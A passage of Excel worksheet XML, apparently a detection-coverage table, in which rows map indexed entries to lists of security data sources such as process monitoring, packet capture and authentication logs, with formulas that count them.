      <c r="B201" s="53" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:C)</f>
        <v>Asset management,Data loss prevention</v>
      </c>
      <c r="C201" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D201" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E201" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F201" s="53"/>
      <c r="G201" s="19"/>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A202" s="16" t="s">
        <v>325</v>
      </c>
      <c r="B202" s="53" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C202" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D202" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E202" s="53">
        <f t="shared" ref="E202:E265" si="8">LEN(TRIM(C202))-LEN(SUBSTITUTE(TRIM(C202),";",""))+1</f>
        <v>2</v>
      </c>
      <c r="F202" s="53"/>
      <c r="G202" s="19"/>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A203" s="16" t="s">
        <v>326</v>
      </c>
      <c r="B203" s="53" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C203" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D203" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E203" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F203" s="53"/>
      <c r="G203" s="19"/>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A204" s="16" t="s">
        <v>327</v>
      </c>
      <c r="B204" s="53" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,System calls,Process monitoring</v>
      </c>
      <c r="C204" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D204" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E204" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F204" s="53"/>
      <c r="G204" s="19"/>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A205" s="16" t="s">
        <v>328</v>
      </c>
      <c r="B205" s="53" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C205" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D205" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E205" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F205" s="53"/>
      <c r="G205" s="19"/>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A206" s="16" t="s">
        <v>329</v>
      </c>
      <c r="B206" s="53" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="C206" s="17">
        <v>0</v>
      </c>
      <c r="D206" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E206" s="53">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F206" s="53"/>
      <c r="G206" s="19"/>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A207" s="16" t="s">
        <v>330</v>
      </c>
      <c r="B207" s="53" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C207" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D207" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E207" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F207" s="53"/>
      <c r="G207" s="19"/>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A208" s="16" t="s">
        <v>331</v>
      </c>
      <c r="B208" s="53" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C208" s="17" t="s">
        <v>332</v>
      </c>
      <c r="D208" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E208" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F208" s="53"/>
      <c r="G208" s="19"/>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A209" s="16" t="s">
        <v>333</v>
      </c>
      <c r="B209" s="53" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C209" s="17">
        <v>100</v>
      </c>
      <c r="D209" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E209" s="53">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F209" s="53"/>
      <c r="G209" s="19"/>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A210" s="16" t="s">
        <v>334</v>
      </c>
      <c r="B210" s="53" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C210" s="17" t="s">
        <v>335</v>
      </c>
      <c r="D210" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E210" s="53">
        <f t="shared" si="8"/>
        <v>6</v>
      </c>
      <c r="F210" s="53"/>
      <c r="G210" s="19"/>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A211" s="16" t="s">
        <v>336</v>
      </c>
      <c r="B211" s="53" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C211" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D211" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E211" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F211" s="53"/>
      <c r="G211" s="19"/>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A212" s="16" t="s">
        <v>337</v>
      </c>
      <c r="B212" s="53" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C212" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D212" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E212" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F212" s="53"/>
      <c r="G212" s="19"/>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A213" s="16" t="s">
        <v>338</v>
      </c>
      <c r="B213" s="53" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows Error Reporting,Process monitoring</v>
      </c>
      <c r="C213" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D213" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E213" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F213" s="53"/>
      <c r="G213" s="19"/>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A214" s="16" t="s">
        <v>339</v>
      </c>
      <c r="B214" s="53" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:C)</f>
        <v>OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</v>
      </c>
      <c r="C214" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D214" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E214" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F214" s="53"/>
      <c r="G214" s="19"/>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A215" s="16" t="s">
        <v>340</v>
      </c>
      <c r="B215" s="53" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs,Application logs</v>
      </c>
      <c r="C215" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D215" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E215" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F215" s="53"/>
      <c r="G215" s="19"/>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A216" s="16" t="s">
        <v>341</v>
      </c>
      <c r="B216" s="53" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs,Application logs</v>
      </c>
      <c r="C216" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D216" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E216" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F216" s="53"/>
      <c r="G216" s="19"/>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A217" s="16" t="s">
        <v>342</v>
      </c>
      <c r="B217" s="53" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C217" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D217" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E217" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F217" s="53"/>
      <c r="G217" s="19"/>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A218" s="16" t="s">
        <v>343</v>
      </c>
      <c r="B218" s="53" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C218" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D218" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E218" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F218" s="53"/>
      <c r="G218" s="19"/>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A219" s="16" t="s">
        <v>344</v>
      </c>
      <c r="B219" s="53" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Binary file metadata,Process use of network,Windows Registry,Loaded DLLs,DLL monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C219" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D219" s="53">
        <f t="shared" si="7"/>
        <v>9</v>
      </c>
      <c r="E219" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F219" s="53"/>
      <c r="G219" s="19"/>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A220" s="16" t="s">
        <v>345</v>
      </c>
      <c r="B220" s="53" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:C)</f>
        <v>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</v>
      </c>
      <c r="C220" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D220" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E220" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F220" s="53"/>
      <c r="G220" s="19"/>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A221" s="16" t="s">
        <v>346</v>
      </c>
      <c r="B221" s="53" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</v>
      </c>
      <c r="C221" s="17" t="s">
        <v>312</v>
      </c>
      <c r="D221" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E221" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F221" s="53"/>
      <c r="G221" s="19"/>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A222" s="16" t="s">
        <v>347</v>
      </c>
      <c r="B222" s="53" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Email gateway,Network intrusion detection system,Web logs</v>
      </c>
      <c r="C222" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D222" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E222" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F222" s="53"/>
      <c r="G222" s="19"/>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A223" s="16" t="s">
        <v>348</v>
      </c>
      <c r="B223" s="53" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C223" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D223" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E223" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F223" s="53"/>
      <c r="G223" s="19"/>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A224" s="16" t="s">
        <v>349</v>
      </c>
      <c r="B224" s="53" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C224" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D224" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E224" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F224" s="53"/>
      <c r="G224" s="19"/>
    </row>
    <row r="225" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A225" s="16" t="s">
        <v>350</v>
      </c>
      <c r="B225" s="53" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C225" s="17">
        <v>100</v>
      </c>
      <c r="D225" s="53">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E225" s="53">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F225" s="53"/>
      <c r="G225" s="19"/>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A226" s="16" t="s">
        <v>351</v>
      </c>
      <c r="B226" s="53" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C226" s="17" t="s">
        <v>352</v>
      </c>
      <c r="D226" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E226" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F226" s="53"/>
      <c r="G226" s="19"/>
    </row>
    <row r="227" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A227" s="16" t="s">
        <v>353</v>
      </c>
      <c r="B227" s="53" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C227" s="17" t="s">
        <v>354</v>
      </c>
      <c r="D227" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E227" s="53">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F227" s="53"/>
      <c r="G227" s="19"/>
    </row>
    <row r="228" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A228" s="16" t="s">
        <v>355</v>
      </c>
      <c r="B228" s="53" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C228" s="17">
        <v>100</v>
      </c>
      <c r="D228" s="53">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E228" s="53">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F228" s="53"/>
      <c r="G228" s="19"/>
    </row>
    <row r="229" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A229" s="16" t="s">
        <v>356</v>
      </c>
      <c r="B229" s="53" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C229" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D229" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E229" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F229" s="53"/>
      <c r="G229" s="19"/>
    </row>
    <row r="230" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A230" s="16" t="s">
        <v>357</v>
      </c>
      <c r="B230" s="53" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C230" s="17" t="s">
        <v>358</v>
      </c>
      <c r="D230" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E230" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F230" s="53"/>
      <c r="G230" s="19"/>
    </row>
    <row r="231" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A231" s="16" t="s">
        <v>359</v>
      </c>
      <c r="B231" s="53" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C231" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D231" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E231" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F231" s="53"/>
      <c r="G231" s="19"/>
    </row>
    <row r="232" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A232" s="16" t="s">
        <v>360</v>
      </c>
      <c r="B232" s="53" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C232" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D232" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E232" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F232" s="53"/>
      <c r="G232" s="19"/>
    </row>
    <row r="233" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A233" s="16" t="s">
        <v>361</v>
      </c>
      <c r="B233" s="53" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Windows Registry,API monitoring</v>
      </c>
      <c r="C233" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D233" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E233" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F233" s="53"/>
      <c r="G233" s="19"/>
    </row>
    <row r="234" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A234" s="16" t="s">
        <v>362</v>
      </c>
      <c r="B234" s="53" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C234" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D234" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E234" s="53">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F234" s="53"/>
      <c r="G234" s="19"/>
    </row>
    <row r="235" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A235" s="16" t="s">
        <v>363</v>
      </c>
      <c r="B235" s="53" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web application firewall logs,Web logs,Packet capture</v>
      </c>
      <c r="C235" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D235" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E235" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F235" s="53"/>
      <c r="G235" s="19"/>
    </row>
    <row r="236" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A236" s="16" t="s">
        <v>364</v>
      </c>
      <c r="B236" s="53" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
      <c r="C236" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D236" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E236" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F236" s="53"/>
      <c r="G236" s="19"/>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A237" s="16" t="s">
        <v>365</v>
      </c>
      <c r="B237" s="53" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
      <c r="C237" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D237" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E237" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F237" s="53"/>
      <c r="G237" s="19"/>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A238" s="16" t="s">
        <v>366</v>
      </c>
      <c r="B238" s="53" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
      <c r="C238" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D238" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E238" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F238" s="53"/>
      <c r="G238" s="19"/>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A239" s="16" t="s">
        <v>367</v>
      </c>
      <c r="B239" s="53" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:C)</f>
        <v>BIOS,Component firmware</v>
      </c>
      <c r="C239" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D239" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E239" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F239" s="53"/>
      <c r="G239" s="19"/>
    </row>
    <row r="240" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A240" s="16" t="s">
        <v>368</v>
      </c>
      <c r="B240" s="53" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</v>
      </c>
      <c r="C240" s="17" t="s">
        <v>369</v>
      </c>
      <c r="D240" s="53">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E240" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F240" s="53"/>
      <c r="G240" s="19"/>
    </row>
    <row r="241" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A241" s="16" t="s">
        <v>370</v>
      </c>
      <c r="B241" s="53" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C241" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D241" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E241" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F241" s="53"/>
      <c r="G241" s="19"/>
    </row>
    <row r="242" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A242" s="16" t="s">
        <v>371</v>
      </c>
      <c r="B242" s="53" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
      <c r="C242" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D242" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E242" s="53">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F242" s="53"/>
      <c r="G242" s="19"/>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A243" s="16" t="s">
        <v>372</v>
      </c>
      <c r="B243" s="53" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</v>
      </c>
      <c r="C243" s="17" t="s">
        <v>373</v>
      </c>
      <c r="D243" s="53">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E243" s="53">
        <f t="shared" si="8"/>
        <v>7</v>
      </c>
      <c r="F243" s="53"/>
      <c r="G243" s="19"/>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A244" s="16" t="s">
        <v>374</v>
      </c>
      <c r="B244" s="53" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C244" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D244" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E244" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F244" s="53"/>
      <c r="G244" s="19"/>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A245" s="16" t="s">
        <v>375</v>
      </c>
      <c r="B245" s="53" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C245" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D245" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E245" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F245" s="53"/>
      <c r="G245" s="19"/>
    </row>
    <row r="246" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A246" s="43" t="s">
        <v>376</v>
      </c>
      <c r="B246" s="53" t="str">
        <f>LOOKUP(A246,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C246" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D246" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E246" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F246" s="53"/>
      <c r="G246" s="19"/>
    </row>
    <row r="247" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A247" s="43" t="s">
        <v>377</v>
      </c>
      <c r="B247" s="53" t="str">
        <f>LOOKUP(A247,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C247" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D247" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E247" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F247" s="53"/>
      <c r="G247" s="19"/>
    </row>
    <row r="248" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A248" s="43" t="s">
        <v>378</v>
      </c>
      <c r="B248" s="53" t="str">
        <f>LOOKUP(A248,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C248" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D248" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E248" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F248" s="53"/>
      <c r="G248" s="19"/>
    </row>
    <row r="249" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A249" s="43" t="s">
        <v>379</v>
      </c>
      <c r="B249" s="53" t="str">
        <f>LOOKUP(A249,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process monitoring,File monitoring,Application logs</v>
      </c>
      <c r="C249" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D249" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E249" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F249" s="53"/>
      <c r="G249" s="19"/>
    </row>
    <row r="250" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A250" s="43" t="s">
        <v>380</v>
      </c>
      <c r="B250" s="53" t="str">
        <f>LOOKUP(A250,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Netflow/Enclave netflow,File monitoring,Authentication logs</v>
      </c>
      <c r="C250" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D250" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E250" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F250" s="53"/>
      <c r="G250" s="19"/>
    </row>
